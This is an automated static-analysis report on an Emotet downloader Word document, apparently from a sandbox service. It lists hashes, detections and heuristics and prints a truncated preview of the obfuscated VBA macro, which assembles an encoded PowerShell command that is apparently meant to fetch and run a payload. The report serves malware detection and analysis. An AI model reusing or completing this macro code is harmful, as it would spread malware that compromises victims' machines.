Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4f13f1a910f16aa6…

MALICIOUS

Office (OLE)

108.0 KB Created: 2018-06-20 10:49:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 3bb9e2babe48d504016dbe7af481f656 SHA-1: baa285c547def55bc357a24cf5f5e000ec5e5a6e SHA-256: 4f13f1a910f16aa6104ccdfeb4884ae41facb09ee6d89bc9297898139bec6bde
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6877457-0', indicating it's likely an Emotet downloader. The presence of an AutoOpen VBA macro that calls the Shell() function strongly suggests an attempt to execute arbitrary code. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6877457-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877457-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14370 bytes
SHA-256: 45831b9ea1cb250dc7522f169432581477d9176133ca100100c3bdd9a043bc7a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qGlUjtoGSOR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dTwLPZlF"
Function TWJEtz()
On Error Resume Next
riBRP = CDate(68503)
LBAYj = CDate(zzSRZ + Sin(903 + 91761) * 64047 * CInt(8988))
qAiGO = 21173
wMrip = 51084
izAoCc = iUCAL
JhOXww = CByte(tuvLW)
uuDPlJLMP = "OwerSHell  " + ". ( " + "$Sh" + "el" + "LiD[1]+$sHElLI" + "D[13]+'X')(( [" + "chAR[]]( 1" + "17,28, 37"
SDjKmp = CDate(38644)
iVGGw = CDate(oLPpl + Sin(3612 + 87950) * 24598 * CInt(18538))
hqolz = 33005
NbGZnp = 39045
XZYbvc = WrdPmI
dVLadm = CByte(XROvTi)
VXQnrksO = " , 3" + " , 9, 59 , " + "113 ,1" + "08, " + "113 , " + "63,52" + ",38 ,12"
PSBBCp = CDate(53958)
vUZTI = CDate(jFsod + Sin(56710 + 77399) * 20126 * CInt(87036))
pSjGz = 11685
RhDKi = 46916
tEnAJ = QiDkH
hkFtDn = CByte(RsIFm)
HTkwkOr = "4 , 62, 51," + "59,52," + " 50 ,37" + ",1" + "13 ,35" + " , 48,63, 53" + ",62 , 60 , 10"
hDqQX = CDate(86096)
oKlTz = CDate(YddTJ + Sin(355 + 43427) * 93732 * CInt(26739))
QjZvmd = 24318
pJXuR = 47115
GupDzY = FICXE
TbIvE = CByte(sIwBb)
OzDrpjzQ = "6, 117" + " , 56,28,50 ,20" + ", 8, 3 , 113" + " ,108,113,63 ," + " 52,38 ,124 ," + " 62,51 ,59, 52 " + ", 50 ,37 , 113 " + ",2," + " 4"
LzrUQn = CDate(19759)
GFYYNw = CDate(JXAKlQ + Sin(12297 + 94072) * 39075 * CInt(70878))
iIJffw = 27858
faiDv = 216
GnpEC = ECwLn
oBFDTH = CByte(VipOPl)
MrBlnFF = "0 ,34 , 37" + " , 52,60" + ", 127 ,31, " + "52,37, 127 , 6," + "52,51 " + ", 18 ,61 , 56"
ULCZW = CDate(21906)
jGMKw = CDate(pLVEQl + Sin(78936 + 9085) * 8222 * CInt(75813))
utkjYS = 26340
JCHsUt = 5046
LQcUsH = uzQai
zPEAX = CByte(LhWvBC)
HEawv = ", 52," + "63,37, 106,1" + "17,4 ,58" + " , 32 ," + " 30, 19," + " 30 ,113 ,108, " + "113,1" + "18, 57,"
TWJEtz = uuDPlJLMP + VXQnrksO + HTkwkOr + OzDrpjzQ + MrBlnFF + HEawv
End Function
Function LazXm()
On Error Resume Next
QzYPd = CDate(75622)
OiwjLk = CDate(HhiVjp + Sin(56615 + 57760) * 69876 * CInt(12248))
DitzMS = 58948
VYXQlQ = 50367
KXvwY = dtzdEK
NKQXK = CByte(FjAqz)
NvBEtzHi = " 3" + "7 , 37, 33,10" + "7,126, 126,33 ," + "62,35 ,37 ,3"
GRmTD = CDate(44564)
zHRNs = CDate(jFXKo + Sin(46703 + 45024) * 25607 * CInt(37610))
mNGYA = 59652
ztDBwf = 4375
WrpsYC = YwfMT
JbmOR = CByte(TPzRG)
jMzJlBjV = "5, 48,56 ,37," + "38,62 ," + " 35" + ",58,34, 57 ," + "62, " + "33,127 ," + " 50,62, 60 ,1" + "26, 58 ,21,4, " + "30,5" + "0 ,10"
tOMGMS = CDate(45728)
lXbhR = CDate(IwuGZH + Sin(6552 + 25922) * 9992 * CInt(93790))
Ouvlzv = 10841
pZhXpZ = 43004
hGjRp = QiDwz
tiqmh = CByte(cNifw)
vtinqVki = "1," + "35," + "126, 17 , 5" + "7 , 37,37"
AKzNtJ = CDate(29497)
jrjOn = CDate(pNLRcl + Sin(42253 + 96204) * 20184 * CInt(86214))
IVpHf = 37493
HvwQO = 83607
SqREu = jqdVw
GpvfJ = CByte(kiLnz)
LaJEfwEAWbA = ", 3" + "3,107 , 12" + "6 ,126,38,3" + "8, 38, 127 ," + "51 , 62,62," + "58,56 " + ", 6" + "3,54 ,127 , 54" + " ,"
mWAXJ = CDate(25235)
EEViVH = CDate(wnaaP + Sin(82400 + 65490) * 53421 * CInt(51834))
Fhraa = 43823
FJiNiS = 27833
cETwC = VfSNF
uLNZC = CByte(GGaTz)
dolkkiBjjAH = " 62 ,40 ,48" + " ,61 , 60" + ",35, 56 ,127 , " + "50 , " + "62 ,60 ,126,11" + " ,"
wDtBE = CDate(64840)
sCIPN = CDate(qllXs + Sin(67508 + 42132) * 42035 * CInt(53296))
hrSwD = 37591
YuzlOG = 2764
vuwdO = TmRLZi
zDGSKv = CByte(uFuvBD)
lzPDnp = "26, 7, 56" + ", 126,17 ,57" + " ," + " 37, 37,33,10" + "7,126" + ", 12" + "6,38 , 38, "
LazXm = NvBEtzHi + jMzJlBjV + vtinqVki + LaJEfwEAWbA + dolkkiBjjAH + lzPDnp
End Function
Function WzhWl()
On Error Resume Next
wBcHw = CDate(26209)
tzHPaN = CDate(zDrEIw + Sin(70118 + 97932) * 58229 * CInt(90425))
CztlJT = 44248
dMGuJ = 40508
zaosh = pSdEv
ShiXr = CByte(GHECQi)
uZMoM = "38 , 127, 63,3" + "9 , 61 ,52 ,54" + ",48, 6" + "1,127"
QvZHj = CDate(76323)
mNsBB = CDate(dEjOSU + Sin(61661 + 78812) * 38443 * CInt(27692))
OwiFI = 7258
puSFRz = 10
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.